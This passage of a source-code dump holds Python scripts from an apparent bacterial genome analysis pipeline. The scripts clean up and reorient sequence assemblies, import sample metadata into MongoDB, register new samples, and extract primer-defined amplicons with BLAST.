expectedArgs = set(['working_dir','report_file'])
# circle_new_start=None,reverse_contig=None,closed_circle=None,broken_circle=None,circularize_with_Ns=0,
# length=250,coverage=10,report_file=None,reference=None,assembler=None
if 'RO' in process:
expectedArgs.update(RO_argset)
if 'DIS' in process:
expectedArgs.update(DIS_argset)
cleanup_args = vars(args)
cleanup_args = {k:v for k,v in cleanup_args.items() if k in expectedArgs}
return cleanupAndWrite(assembly_file,output_file,report_file=report_file,**cleanup_args)
## Load the assemblies
# with utilities.flexible_handle(assembly_file, assembly_compressed, 'rt') as fin:
# seqs = [c for c in SeqIO.parse(fin,assembly_format)]
#Precise manipulation of single contig
# cleaned = None
# if args.circle_new_start or args.reverse_contig:
# if len(seqs) > 1:
# print("Exiting: User provided explicit reorientation instructions for a contig, but multiple contigs are present in assembly")
# sys.exit(1)
# elif args.closed_circle:
# cleaned = shiftCirclarChromosome(seqs[0],args.circle_new_start,args.reverse_contig,N_padding=0)
# elif args.broken_circle:
# cleaned = shiftCirclarChromosome(seqs[0],args.circle_new_start,args.reverse_contig,N_padding=-1)
# elif args.circularize_with_Ns > 0:
# print('Scaffolding not implemented')
# else:
# print('To shift a chromosome, you must specify whether the circle is closed or broken')
# else: ## Complex criteria for manipulation
# if args.closed_circle and len(seqs) > 1:
# print("Warning: Untested parameters. User specified 'closed circle' but multiple contigs are present in assembly")
#
# ## Remove the low-quality contigs:
# ##TODO: consider if another parameter should be passed. At least specify if it came from SPAdes
# circular = args.closed_circle or args.broken_circle##Circles imply high-quality sequence
# cleaned = seqs if circular else cleanup_SPADES(seqs,minimum_length = args.length, minimum_coverage = args.coverage,export_contig_data=report_file)
# ## Reorient to reference if requested
# if args.reference:
# if os.path.isfile(args.reference):
# if circular:
# assert len(seqs) <= 1, 'A multi-contig assembly cannot be a closed circle. This should have been caught prior to analysis'
# if len(seqs) == 1:
# N_padding = -1 ##Do not religate
# if args.closed_circle:
# N_padding=0
# elif args.circularize_with_Ns > 0:
# print('Scaffolding not implemented')
# sys.exit(1)
# cleaned = reorientClosedChromosome(cleaned,args.reference,N_padding=N_padding)
# else: ## Len == 0
# print("No {} contigs passed your exclusion criteria. Exiting ".format(len(seqs)))
# sys.exit(1)
# else:
# ##TODO: dump to Mauve
# print("Have not yet implemented multi-contig reordering. Contact developer")
# pass
# else:
# print("Unable to realign to reference because there is no file: ".format(args.reference))
# if cleaned is not None:
# with open(output_file,'wt') as fout:
# SeqIO.write(cleaned,fout,'fasta')
# print('Saved reoriented assembly at '+output_file)
# return 0
# else:
# print("Unable to clean and orient the assembly")
# return(1)
req_fields = ['Filename','Gaps','Contig_Count']
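## Hypothetical guide table for 'multiple' mode (tab-delimited; extra columns such as Lab_ID may
## also be present and are used when available):
##   Filename                      Gaps    Contig_Count
##   /data/asm/M123_spades.fasta   TRUE    57
##   /data/asm/M124_closed.fasta   FALSE   1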
def multiple(multi_args):
if multi_args.force and multi_args.resume:
print("Exiting: the options 'force' and 'resume' are incompatible. Use only 'force' if you want to overwrite prior files.")
return 1
output_dir = multi_args.output if multi_args.output else utilities.safeMakeOutputFolder(_outputBase)
utilities.safeMakeDir(output_dir)
logFile = os.path.join(output_dir,"AssemblyCleanup.log")
resultFile = os.path.join(output_dir,"AssemblyCleanupTable.tab")
tempFile = utilities.appendToFilename(resultFile, '_temp')
sys.stdout = utilities.Logger(logFile)
assembler_name = None if multi_args.assembler is None else multi_args.assembler.lower()
print("Parameters:")
for k,v in vars(multi_args).items():
print('{} : {}'.format(k,v))
draft_location = multi_args.draft_location
if os.path.isfile(draft_location):
guideFrame = pd.read_table(draft_location)
print('Loaded guide table from '+draft_location)
print("\t table contains {} records".format(len(guideFrame)))
elif os.path.isdir(draft_location):
print("Searching for files in "+os.path.abspath(draft_location))
deep_search = False if multi_args.shallow_search_assemblies else True
guideFrame = NGS_data_utilities.listGenomeFilesWithNames(draft_location,deep_search = deep_search,extension=multi_args.extension)
##Exclude reads
size_limit = multi_args.size_limit
if size_limit > 0:
guideFrame['filesize'] = guideFrame.Filename.apply(os.path.getsize)
small_enough = (guideFrame.filesize <= size_limit)
if sum(small_enough) < len(guideFrame):
print('Only {} of {} files pass the upper size limit of {}'.format(sum(small_enough),len(guideFrame),size_limit))
guideFrame = guideFrame[small_enough].copy()
guideFrame = guideFrame[NGS_data_utilities.dfHeaders].copy()
if guideFrame is None or (len(guideFrame) == 0):
print("Exiting. Failed to retrieve any files")
return 1
if assembler_name:
guideFrame['assembler'] = assembler_name
print('assigned assembler to be '+assembler_name)
else: #This is not passed to AssemblyStats
for i in guideFrame.index:
if 'spades' in guideFrame.loc[i,'Filename'].lower():
guideFrame.loc[i,'assembler'] = 'spades'
print('assigned assembler to be spades for {}'.format(guideFrame.loc[i,'Lab_ID']))
print('Calculating raw stats...')
assemblyStats = AssemblyStats.calculateStats(guideFrame.Filename.tolist(),ass_format=assembler_name,image_dir=output_dir)##This will independently infer assembler from name unless given
if assemblyStats is None or len(assemblyStats) == 0:
print("Exiting. Failed to calculate assembly stats on input")
return 1
assemblyStats['Contig_Count'] = assemblyStats['Contig_Count'].astype(int)
guideFrame = pd.merge(guideFrame,assemblyStats,how='left') ##Should merge on Filename. Don't want confusion if they share other fields
if multi_args.BCFB_PacBio_Name:
print('interpreting BCFB PacBio names...')
for i in guideFrame.index:
guideFrame.loc[i,'Gaps'] = False if '.ro1m.' in guideFrame.loc[i,'Filename'] else True
else:
guideFrame['Gaps'] = True ### Assume no closed genomes unless stated
else:
print("Exiting. Unable to find the location of draft files: {}".format(draft_location))
return(1)
print('Loaded data...')
process = None
if multi_args.reorient:
process = 'RO'
elif multi_args.discard:
process = 'DIS'
elif multi_args.discard_then_reorient:
process = 'DIS_RO'
else:
print("Exiting. No processing specified")
return(1)
expectedArgs = set(['working_dir','report_file','assembler'])
# circle_new_start=None,reverse_contig=None,closed_circle=None,broken_circle=None,circularize_with_Ns=0,
# length=250,coverage=10,report_file=None,reference=None,assembler=None
if 'RO' in process:
expectedArgs.update(RO_argset)
if not os.path.isfile(multi_args.reference):
print("Cannot find reference file. Exiting")
return 1
if 'DIS' in process:
expectedArgs.update(DIS_argset)
tag = multi_args.tag if multi_args.tag else process
print('Result files will have the tag "{}"'.format(tag))
##TODO test columns here
permitted_fields = req_fields + list(expectedArgs)
keep_fields = [x for x in guideFrame.columns if x in permitted_fields]
parameterFrame = guideFrame[keep_fields].copy()
if len(parameterFrame) == 0:
return 1 ##Failure
fail_list = []
for i,row in parameterFrame.iterrows():##Row gets converted to keyword arguments; shares index with guideFrame
assembly_file = row['Filename']
if not os.path.isfile(assembly_file):
print("Error: unable to find file: {}".format(assembly_file))
output_file = 'error. '
else:
print("Working on "+os.path.basename(assembly_file))
print("\tat {}".format(time.ctime()))
del row['Filename']
if 'Contig_Count' in row.index:
if (str(row['Contig_Count']) == str(1)):
gaps = row['Gaps']
gap_bool = True ##Safest default (will introduce contig breaks). But should probably skip reorientation
if isinstance(gaps,str):
if gaps.upper() == 'TRUE':
gap_bool = True
elif gaps.upper() == 'FALSE':
gap_bool = False
else:
print("unable to interpret 'gaps' notation: {}".format(gaps))
continue
elif isinstance(gaps,bool):
gap_bool = gaps
else:
print("unable to interpret 'gaps' notation: {}".format(gaps))
continue
if gap_bool:
row['broken_circle'] = True ##NOTE: with our bacteria, we assume circle
else:
row['closed_circle'] = True
del row['Gaps']
assembly_basename = utilities.appendToFilename(os.path.basename(assembly_file),'_'+tag)
output_file = os.path.join(output_dir,assembly_basename)
report_file = os.path.join(output_dir,os.path.basename(assembly_file)) + '.report.txt'
has_out = os.path.isfile(output_file)
has_rpt = os.path.isfile(report_file)
if has_out or has_rpt:
if multi_args.force:
if has_out:
print("Removing prexisting file: {}".format(output_file))
os.remove(output_file)
if has_rpt:
print("Removing pre-existing file: {}".format(report_file))
os.remove(report_file)
else:
if not multi_args.resume:
print("Error: Refusing to overwrite pre-existing output files: \n\t{}\n\t{}".format(output_file,report_file))
continue
try:
open(output_file, 'a').close()
os.remove(output_file)
except IOError:
print("Error. Do not have permission to write to output file \n\t{}".format(output_file))
continue
cleanup_args = vars(multi_args).copy() ##TODO: put this up front?
cleanup_args.update(row.to_dict())
cleanup_args['working_dir'] = os.path.join(output_dir,'work')
cleanup_args = {k:v for k,v in cleanup_args.items() if k in expectedArgs}
if 'Mean_Coverage' in row.index:
proportion_cutoff = multi_args.coverage_proportion * row.loc['Mean_Coverage']
min_coverage = max(multi_args.coverage,proportion_cutoff)
cleanup_args['coverage'] = min_coverage
del cleanup_args['Mean_Coverage']
else:
cleanup_args['coverage'] = multi_args.coverage ##This should actually be irrelevant --
try:
print("Arguments:")
print(cleanup_args)
if cleanupAndWrite(assembly_file,output_file,report_file=report_file,**cleanup_args) != 0: ##TODO: return stats
output_file = 'error'
fail_list.append(assembly_file)
except Exception as e:
fail_list.append(assembly_file)
output_file = 'error'
warn="Exception on cleanupAndWrite:"
utilities.printExceptionDetails(e,warn)
print() ##Blank line
guideFrame.loc[i,'CleanedFile'] = output_file
guideFrame.to_csv(tempFile,index=False,sep='\t')
print("Errors on {} files: ".format(len(fail_list)))
print("\n\t".join(fail_list))
if process in ['DIS','DIS_RO']: ##recalculate stats for filtered contig sets
assemblyStats2 = AssemblyStats.calculateStats(guideFrame.CleanedFile.tolist(),ass_format=assembler_name)
if assemblyStats2 is not None:
# assemblyStats2.rename(columns={'Filename':'CleanedFile'},inplace=True)
guideFrame = AssemblyStats.BeforeAndAfter(guideFrame.set_index("CleanedFile"),assemblyStats2.set_index('Filename'))
# guideFrame = pd.merge(guideFrame,assemblyStats2,on='CleanedFile',suffixes=('_raw',''),how='outer')
print("Reporting stats for {} genomes.".format(len(guideFrame)))
guideFrame.fillna('N/A', inplace=True)
utilities.safeOverwriteTable(resultFile, guideFrame, 'tab',index=False)
return 0
# else:
# return 1 ##Absence of assembly stats frame indicates failure to generate files
# assembly_file,output_file,circle_new_start=None,reverse_contig=None,closed_circle=None,broken_circle=None,circularize_with_Ns=0,
# length=250,coverage=10,report_file=None,reference=None
#
# ## Load the assemblies
# assembly_format,assembly_compressed = utilities.guessFileFormat(assembly_file)
# with utilities.flexible_handle(assembly_file, assembly_compressed, 'rt') as fin:
# seqs = [c for c in SeqIO.parse(fin,assembly_format)]
# #Precise manipulation of single contig
# cleaned = None
# if args.circle_new_start or args.reverse_contig:
# if len(seqs) > 1:
# print("Exiting: User provided explicit reorientation instructions for a contig, but multiple contigs are present in assembly")
# sys.exit(1)
# elif args.closed_circle:
# cleaned = shiftCirclarChromosome(seqs[0],args.circle_new_start,args.reverse_contig,N_padding=0)
# elif args.broken_circle:
# cleaned = shiftCirclarChromosome(seqs[0],args.circle_new_start,args.reverse_contig,N_padding=-1)
# elif args.circularize_with_Ns > 0:
# print('Scaffolding not implemented')
# else:
# print('To shift a chromosome, you must specify whether the circle is closed or broken')
# else: ## Complex criteria for manipulation
# if args.closed_circle and len(seqs) > 1:
# print("Warning: Untested parameters. User specified 'closed circle' but multiple contigs are present in assembly")
#
# ## Remove the low-quality contigs:
# ##TODO: consider if another parameter should be passed. At least specify if it came from SPAdes
# circular = args.closed_circle or args.broken_circle##Circles imply high-quality sequence
# cleaned = seqs if circular else cleanup_SPADES(seqs,minimum_length = args.length, minimum_coverage = args.coverage,export_contig_data=report_file)
# ## Reorient to reference if requested
# if args.reference:
# if os.path.isfile(args.reference):
# if circular:
# assert len(seqs) <= 1, 'A multi-contig assembly cannot be a closed circle. This should have been caught prior to analysis'
# if len(seqs) == 1:
# N_padding = -1 ##Do not religate
# if args.closed_circle:
# N_padding=0
# elif args.circularize_with_Ns > 0:
# print('Scaffolding not implemented')
# sys.exit(1)
# cleaned = reorientClosedChromosome(cleaned,args.reference,N_padding=N_padding)
# else: ## Len == 0
# print("No {} contigs passed your exclusion criteria. Exiting ".format(len(seqs)))
# sys.exit(1)
# else:
# ##TODO: dump to Mauve
# print("Have not yet implemented multi-contig reordering. Contact developer")
# pass
# else:
# print("Unable to realign to reference because there is no file: ".format(args.reference))
# if cleaned is not None:
# with open(output_file,'wt') as fout:
# SeqIO.write(cleaned,fout,'fasta')
# print('Saved reoriented assembly at '+output_file)
# else:
# print("Unable to clean and orient the assembly")
# return(1)
import argparse
def main():
print("")
print("Running {} from {} at {}".format(SCRIPT_NAME,os.getcwd(),time.ctime()))
print("...script is found in {}\n".format(SCRIPT_DIR))
parser = argparse.ArgumentParser(description='A program to select and reorder decent contigs in genome assemblies (especially from SPADES).')
##Info
process_group = parser.add_argument_group(title='processes',description="Choose at least one process to apply to the genomes. Defaults to 'discard' behavior")
process_group.add_argument('--reorient',action='store_true',help="Reorient genomes according to a reference")
process_group.add_argument('--discard',action='store_true',help="Discard low value contigs (based on length and coverage)")
process_group.add_argument('--discard_then_reorient',action='store_true',help='First discard low value contigs, then reorient according to reference')
parser.add_argument('--force','-f',action='store_true',help='Force overwrite of output')
parser.add_argument('--version','-V',action='version',version='%(prog)s {}'.format(SCRIPT_VERSION))
parser.add_argument('--circularize_with_Ns',type=int,default=0,help='Assume that contigs are circular and add this many Ns to fill circle. Default is to leave contig broken')
parser.add_argument('--reference','-r',help="Reference genome for contig reordering")
parser.add_argument('--coverage','-c',help='Minimum coverage to keep contig (extracted from SPADES contig description) (will use maximum of coverage and coverage_proportion)',default=5,type=int)
parser.add_argument('--coverage_proportion','-p',type=float,help='Minimum coverage to keep contig, as proportion of genome-wide mean. (will use maximum of coverage and coverage_proportion)',default=0)
parser.add_argument('--length','-l',help='Minimum length to keep contig',default=250,type=int)
parser.add_argument('--assembler','-a',help="Assembler used to produce contigs (e.g. SPADES). Provides description of read coverage for cleaning")
# parser.add_argument('--debug',action='store_true',help='Create a temporary repository in current directory')
subparsers = parser.add_subparsers(title='subcommands',
description='valid subcommands',
help='additional help')
single_ass = subparsers.add_parser('single')
single_ass.set_defaults(func=single)
single_ass.add_argument('assembly',help='assembly FASTA file to reorder')
single_ass.add_argument('--output','-o',help='File to write processed assembly. Default is '+_outputBase)
single_ass.add_argument('--closed_circle',action='store_true',help='The assembly is a closed, circular contig')
single_ass.add_argument('--broken_circle',action='store_true',help='The assembly is in a single contig, but was not closed')
single_ass.add_argument('--circle_new_start','-c',type=int,help='New start position for single circular contig in assembly file')
single_ass.add_argument('--reverse_contig',action='store_true',help='Reverse the single contig in assembly file')
multi_ass = subparsers.add_parser('multiple')
multi_ass.set_defaults(func=multiple)
multi_ass.add_argument('draft_location',help='Either a directory containing files to reorder or a table with required fields: {}'.format(', '.join(req_fields)))
multi_ass.add_argument('--output','-o',help='Directory to write processed assemblies. Default is '+_outputBase)
multi_ass.add_argument('--resume',action='store_true',help='Suppresses error messages when result files are found in output directory.')
multi_ass.add_argument('--tag','-t',help='Tag to append to filenames, indicating whether they have been reoriented (RO by default) or cleaned (CL) ')
multi_ass.add_argument('--shallow_search_assemblies',help='If drafts are in a folder, do not search subdirectories for assemblies',action='store_true')
multi_ass.add_argument('--BCFB_PacBio_Name',help='Files are named with BCFB PacBio conventions (".ro1m." means circularized)',action='store_true')
multi_ass.add_argument('--extension','-e',help='Limit search to files with this extension')
multi_ass.add_argument('--size_limit','-s',help='Limit on the size of files to analyze, in bytes (e.g. to exclude read data). Set to 0 to inactivate',default=25000000,type=int)
##TODO: option to break a contig to reorder?
### Check the import and export locations
args = parser.parse_args()
##Establish shared settings
##Run the program
result = args.func(args)
if result != 0:
parser.print_usage()
if __name__ == "__main__":
if not utilities.has_preferred_python():
raise Exception("Upgrade your python version")
main()
```
#### File: BMGAP/pipeline/bmgap_metadata_importer.py
```python
import sys
import csv
import re
from pymongo import MongoClient
def main(args, db):
import_data = get_data_to_import(args[0])
print(import_data[0].keys())
for row in import_data:
import_the_data(row, db)
def import_the_data(data_to_import, db):
record = db.internal.find_one({"identifier": data_to_import["BMGAP_ID"]})
if record:
try:
does_match = re.search(data_to_import["Lab_Id"], record["Lab_ID"])
if does_match:
metadata_to_import = prepare_data_for_import(data_to_import)
db.internal.update_one(
{"identifier": data_to_import["BMGAP_ID"]},
{"$set": {"BML_Data": metadata_to_import}},
)
except:
print(data_to_import["BMGAP_ID"])
def prepare_data_for_import(data_to_import):
bml_metadata = {}
bml_metadata["country"] = (
data_to_import["Submitter_Country"]
if data_to_import["Submitter_Country"] != "NULL"
else ""
)
bml_metadata["state"] = (
data_to_import["Submitter_State"]
if data_to_import["Submitter_State"] != "NULL"
else ""
)
bml_metadata["year"] = (
data_to_import["Year_Collected"]
if data_to_import["Year_Collected"] != "NULL"
else ""
)
bml_metadata["sample_type"] = (
data_to_import["Source_of_Specimen"]
if data_to_import["Source_of_Specimen"] != "NULL"
else ""
)
bml_metadata["lab_st"] = (
data_to_import["CDC_SAST"] if data_to_import["CDC_SAST"] != "NULL" else ""
)
bml_metadata["lab_sg"] = (
data_to_import["CDC_SASG"] if data_to_import["CDC_SASG"] != "NULL" else ""
)
bml_metadata["nm_pcr"] = (
data_to_import["Nm_PCR_Results"]
if data_to_import["Nm_PCR_Results"] != "NULL"
else ""
)
bml_metadata["hi_pcr"] = (
data_to_import["Hi_PCR_Results"]
if data_to_import["Hi_PCR_Results"] != "NULL"
else ""
)
if bml_metadata["state"]:
bml_metadata["location"] = bml_metadata["state"]
elif bml_metadata["country"]:
bml_metadata["location"] = bml_metadata["country"]
return bml_metadata
def get_data_to_import(filename):
data_to_import = []
with open(filename, "r") as data_file:
reader = csv.DictReader(data_file)
for row in reader:
data_to_import += [row]
return data_to_import
if __name__ == "__main__":
if len(sys.argv) == 2:
mongo_server = "mongodb://bmgap-poc.biotech.cdc.gov"
else:
mongo_server = "mongodb://" + sys.argv[1]
client = MongoClient(
mongo_server, username="bmgap-writer", password="<PASSWORD>", authSource="BMGAP"
)
db_connection = client.BMGAP
main(sys.argv[2:], db_connection)
```
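`prepare_data_for_import` above is a pure mapping from the BML spreadsheet columns onto the `BML_Data` sub-document, so it is easy to exercise in isolation. A minimal sketch with an invented CSV row (all values are hypothetical; pymongo must be installed for the module import to succeed):

```python
from bmgap_metadata_importer import prepare_data_for_import

# Invented row of the kind csv.DictReader would yield; "NULL" cells become empty strings.
row = {
    "Submitter_Country": "USA",
    "Submitter_State": "GA",
    "Year_Collected": "2019",
    "Source_of_Specimen": "CSF",
    "CDC_SAST": "ST-11",
    "CDC_SASG": "NmW",
    "Nm_PCR_Results": "NULL",
    "Hi_PCR_Results": "NULL",
}
print(prepare_data_for_import(row))
# {'country': 'USA', 'state': 'GA', 'year': '2019', 'sample_type': 'CSF',
#  'lab_st': 'ST-11', 'lab_sg': 'NmW', 'nm_pcr': '', 'hi_pcr': '', 'location': 'GA'}
```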
#### File: BMGAP/pipeline/insert_new_sample.py
```python
import re
import os
import argparse
from pymongo import MongoClient
def main(identifier, db_host, count, submitter, reads):
mongo_host = db_host
identifier = identifier
source_path = reads
fwd_read = get_fastq_file(source_path) if source_path else None
client = MongoClient(
mongo_host,
27017,
username="bmgap-writer",
password="<PASSWORD>",
authSource="BMGAP",
)
db = client.BMGAP
insert_statement = {
"identifier": identifier,
"count": count,
"Submitter": submitter,
}
if fwd_read:
insert_statement["fwdReadPath"] = os.path.join(source_path, fwd_read)
res = db.internal.insert_one(insert_statement)
print(res.inserted_id)
def get_fastq_file(path):
if (
re.search("instruments", path)
or re.search("bmgap-pipeline-testing", path)
or re.search("data/DTT", path)
):
# If the data comes from BML remove the sample subdirectory from the fastq path
fastq_path_raw = path.split("/")
fastq_path_parts = [x for x in fastq_path_raw if x != ""]
fastq_path = os.path.join(*fastq_path_parts[:-1])
contents = os.listdir(os.path.join("/" + fastq_path))
else:
contents = os.listdir(path)
for obj in contents:
if re.search(".*R1_001.fastq.gz", str(obj)):
return obj
return None
if __name__ == "__main__":
parser = argparse.ArgumentParser()
# Identifier
parser.add_argument("-i", "--identifier", action="store", required=True)
# Database
parser.add_argument("-d", "--db_host", action="store", required=True)
# Count
parser.add_argument("-c", "--count", action="store", required=False, default=1)
# Submitter
parser.add_argument(
"-s", "--submitter", action="store", required=False, default="BML"
)
# Path
parser.add_argument("-r", "--reads", action="store", required=False, default=None)
args = vars(parser.parse_args())
main(**args)
```
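`get_fastq_file` picks out the forward (R1) read from a run directory. A quick sketch using a throwaway temporary directory (file names are invented; importing the module requires pymongo):

```python
import os
import tempfile

from insert_new_sample import get_fastq_file

with tempfile.TemporaryDirectory() as d:
    # Empty placeholder reads; only the R1 file matches the pattern used by get_fastq_file.
    open(os.path.join(d, "sampleA_S1_R1_001.fastq.gz"), "w").close()
    open(os.path.join(d, "sampleA_S1_R2_001.fastq.gz"), "w").close()
    print(get_fastq_file(d))  # -> sampleA_S1_R1_001.fastq.gz
```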
#### File: pipeline/locusextractor/AmpliconExtractor.py
```python
import os
import pandas as pd
import re
import sys
import genomeOrganizer
import utilities
import tempfile
# from subprocess import call, DEVNULL
from Bio.Blast.Applications import NcbiblastnCommandline
from Bio import SeqIO
from Bio.Seq import Seq
from Bio.SeqRecord import SeqRecord
from Bio.Alphabet import IUPAC
from BLASThelpers import makeblastdb, loadBLASTtableToDataFrame,blankBLASTtable
from shutil import copytree
# _primer_file = 'settings/sample-primers.csv'
default_verbose = __name__ == "__main__"
current_verbose = default_verbose
script_version=1
script_subversion = 5
def vprint(text):
if current_verbose:
print(text)
def print(text):#pylint: disable=redefined-builtin
export_text = "{}".format(text)
if __name__ != "__main__":
export_text = "\t"+export_text
sys.stdout.write(export_text+"\n")
def read_file_to_dict(filename):
primer_cols = ['Locus','Role','Region','Name','Direction','Sequence']
primer_frame = pd.read_table(filename,comment='#',dtype=str,skip_blank_lines=True) #skip blank lines is true by default
###Skip blank lines does not work
primer_frame = primer_frame.dropna(how='all')
primer_frame['Direction'].fillna('',inplace=True)
primer_frame['Region'].fillna('All',inplace=True)
primer_dict = dict()
for _, row in primer_frame.iterrows():
##Parse
locus = row['Locus']
region = row['Region']
primer = row['Name']
sequence = row['Sequence']
direction = row['Direction']
##Role can be a list
function = []
role = row['Role']
if re.match('PCR',role,re.IGNORECASE):
function = ['PCR']
elif re.match('Seq',role,re.IGNORECASE):
function = ['Seq']
elif re.match('All',role,re.IGNORECASE):
function = ['PCR','Seq']
else: ##Did not find function, use for both steps
function = ['PCR','Seq']
vprint("Did not identify function of primer {} -- use for both PCR and Seq".format("-".join([locus,primer])))
vprint('To assign a function, write "PCR", "Seq", or "All" in the second column')
##Construct dict of dict
if locus not in primer_dict:
primer_dict[locus] = dict()
locus_dict = primer_dict[locus]
for f in function: #Add data to both PCR and Seq if appropriate
if f not in locus_dict:
locus_dict[f] = dict()
function_dict = locus_dict[f]
if region not in function_dict:
function_dict[region] = dict()
region_dict = function_dict[region]
region_dict[primer] = sequence
##TODO add direction
#
#
# _primer_dict = dict() ## Dict of Dicts: locus, function (PCR,Seq),region,name,sequence
# with open(filename) as primers:
# p_reader = csv.reader(primers)
# p_reader = [row for row in p_reader if not row[0].startswith('#')] #strip comments
# for row in p_reader:
# row = [item for item in row if item != ''] #strip empy strings
# if len(row) > 0:
# vprint("Parsing row with {} items".format(len(row)))
# ##First is locus name -- no exception
# locus = row[0]
# ##Last is sequence -- no exception
# sequence = row[-1].replace(" ","")
# ##Second to last is primer name -- no exception
# primer = row[-2]
# vprint("Name is {}-{}".format(locus,primer))
# ##Function and region are optional
# c_max = len(row) - 3 #last two indexes are used, so -3 is the maximum that is open
# c = 1
# ##Second could be function (PCR,Seq,All)
# if c <= c_max:
# function = []
# if re.match('PCR',row[c],re.IGNORECASE):
# function = ['PCR']
# c+=1
# elif re.match('Seq',row[c],re.IGNORECASE):
# function = ['Seq']
# c+=1
# elif re.match('All',row[c],re.IGNORECASE):
# function = ['PCR','Seq']
# c+=1
# else: ##Did not find function, use for both steps
# function = ['PCR','Seq']
# vprint("Did not identify function of primer {} -- use for both PCR and Seq".format("-".join([locus,primer])))
# vprint('To assign a function, write "PCR", "Seq", or "All" in the second column')
# region = 'All'
# if c <= c_max:
# region = row[c]
# if locus not in _primer_dict:
# _primer_dict[locus] = dict()
# locus_dict = _primer_dict[locus]
# for f in function: #Add data to both PCR and Seq if appropriate
# if f not in locus_dict:
# locus_dict[f] = dict()
# function_dict = locus_dict[f]
# if region not in function_dict:
# function_dict[region] = dict()
# region_dict = function_dict[region]
# region_dict[primer] = sequence
# #~ print("Found primers for the following genes: "+";".join(_primer_dict.keys())) #Not accurate. Does not confirm that dict contains primers
return primer_dict
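## Hypothetical primer table rows (tab-delimited, with a header line naming the columns
## Locus, Role, Region, Name, Direction and Sequence; lines starting with '#' are ignored):
##   porA    PCR   All   porA-PCR-F       For   GATCGATCGATCGATCG
##   porA    Seq   VR1   porA-seq-VR1-F   For   CGATCGATCGATCGATC
## The result is keyed as primer_dict[locus][role][region][primer_name] = sequence, with rows
## whose Role is 'All' (or unrecognized) copied into both the 'PCR' and 'Seq' branches.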
## map_primers_to_genome will use BLAST to identify where primers are likely to bind in the genome.
# _primer_dict is a primer hierarchy as returned by "read_file_to_dict"
# blast_db is the name of the genome db you want to search
# outfile is destination to write the blast results to. If outfile is given, we assume that you want details about where the primers map and will put minor warnings to stdout; otherwise, we assume you don't care and the are suppressed
# ## User can "cheat" by passing "range_from" and "range_to" integers in the locus dict.
# Returns : export_regions[locus][subregion][name] = {'contig','start','stop'} where start and stop are the first coordinates past the low and high primers
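## Example of the returned structure (locus and primer names here are hypothetical):
##   export_regions['porA']['All']['porA_F1_R1_genomeA'] = {'contig': 'contig_3', 'start': 1012, 'stop': 2054}
##   export_regions['porA']['OuterRange'] = [region_record spanning the PCR primer hits]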
## Returns a dict with genome information (key in CAPS): isolate NAME, ORIGINAL filename, FASTA filename, blast DB name, contig SEQS
def setupGenomeForBlastBasedExtraction(genome_name,genome_file,tempDir,file_format = '',is_compressed = None):
##Genome information
genomeInfo = dict()
genomeInfo['name'] = genome_name
genomeInfo['original'] = genome_file #just for reporting
##Some people use weird genome filenames, so I need to copy it to something without special characters
temp_genome = os.path.join(tempDir,genome_name + '.fasta')
genomeOrganizer.exportGenomeFASTA(genome_file,temp_genome,file_format,is_compressed)
genomeInfo['fasta'] = temp_genome
if not os.path.isfile(genomeInfo['fasta']):
raise IOError("Illegitimate file at "+genomeInfo['fasta'])
#~ genomeDir,genomeFile = os.path.split(os.path.abspath(genomeInfo['fasta']))
#open the genome file for extracting sequences
genome_handle = utilities.flexible_handle(genomeInfo['original'], is_compressed, 'rt')
genomeInfo['seqs'] = SeqIO.to_dict(SeqIO.parse(genome_handle, file_format))
print("{} bp in {} contig(s)".format(sum([len(c) for c in genomeInfo['seqs'].values()]),len(genomeInfo['seqs']))) ##Appends to sequence identifier line
if len(genomeInfo['seqs']) == 0:
raise ValueError("No sequences parsed from file {}".format(genomeInfo['fasta']))
genome_handle.close()
# make search database for genome
db_base = os.path.basename(genomeInfo['fasta'])
genomeInfo['db'] = os.path.join(tempDir,db_base)
makeblastdb(genomeInfo['fasta'],genomeInfo['db'])
return genomeInfo
class AmpliconExtractor:
def __init__(self,primer_file,working_dir=None,generate_output=False):
### Make writable directories
if working_dir is None:
working_dir = os.getcwd()
##utilities.safeMakeOutputFolder(os.path.join(working_dir,'AmpExtTemp'))
self.generate_output = generate_output
self.primers_dict = read_file_to_dict(primer_file)
if generate_output:
self.outDir = utilities.safeMakeOutputFolder(os.path.join(working_dir,'AmpliconExtractor'))
self.sequence_files = {locus: os.path.join(self.outDir,'{}_primer-extracted_sequences.fasta'.format(locus)) for locus in self.primers_dict.keys()}
self.amplicon_info_file = os.path.join(self.outDir,'amplicon_information.tab')
self.tempDirObj = tempfile.TemporaryDirectory(suffix='_AmpExt', prefix='tmp', dir=self.outDir)
else:
self.outDir = self.sequence_files = self.amplicon_info_file = None
self.tempDirObj = tempfile.TemporaryDirectory(suffix='_AmpExt', prefix='tmp', dir=working_dir)
self.amplicon_info_list = []
##Full service function for a single genome
def evaluateGenome(self,genome_name,genome_file,file_format = '',is_compressed = None, keep_temp = False):
print("## Begin searching sequence {} ## ".format(genome_name))
primer_hit_file = None
if self.outDir is not None:
primer_hit_file = os.path.join(self.outDir,'primer_hits.tab')
primer_hit_file = utilities.appendToFilename(primer_hit_file, genome_name)
genomeInfo = setupGenomeForBlastBasedExtraction(genome_name,genome_file,self.tempDirObj.name,file_format,is_compressed)
amplicon_info = {'Filename':genome_file,"Lab_ID":genome_name}
primers_loc = self.map_primers_to_genome(genomeInfo['db'],primer_hit_file,keep_temp=keep_temp)
for locus, locus_dict in primers_loc.items():
for subregion, subregion_dict in locus_dict.items():
if isinstance(subregion_dict,dict): ##Sequencing features
for name,locations in subregion_dict.items():
print('Seq name :'+ name)
contig = locations['contig']
print('On contig: '+contig)
contig_seq = genomeInfo['seqs'][contig]
print('Found contig: {}, length {}'.format(contig_seq.id,len(contig_seq)))
start = locations['start']
print('Start: {}'.format(start))
stop = locations['stop']
print('Stop: {}'.format(stop))
my_seq = contig_seq[start:stop+1]
new_name = name.replace(' ','_')
my_seq.id = new_name
my_seq.description ="{}:{}-{}".format(contig,start,stop)
# my_fasta = SeqRecord(my_seq,id=name.replace(' ','_'),description="{}:{}-{}".format(contig,start,stop))
if self.sequence_files is not None:
with open(self.sequence_files[locus],"a") as fout:
SeqIO.write(my_seq,fout,'fasta')
if file_format == 'fastq':
fastq_file = utilities.setExt(self.sequence_files[locus], 'fastq', False)
with open(fastq_file,'a') as fastq_out:
SeqIO.write(my_seq,fastq_out,'fastq')
elif subregion == 'OuterRange': ##Original amplicon...actually a range
range_list = subregion_dict
for item in range_list:
assert isinstance(item,region_record)
if len(range_list) == 1:
rr = range_list[0]
amplicon_info['{}_PCR_size'.format(locus)] = "{}".format(rr.get_max() - rr.get_min() + 1)
amplicon_info['{}_contig'.format(locus)] = "{}".format(rr.contig)
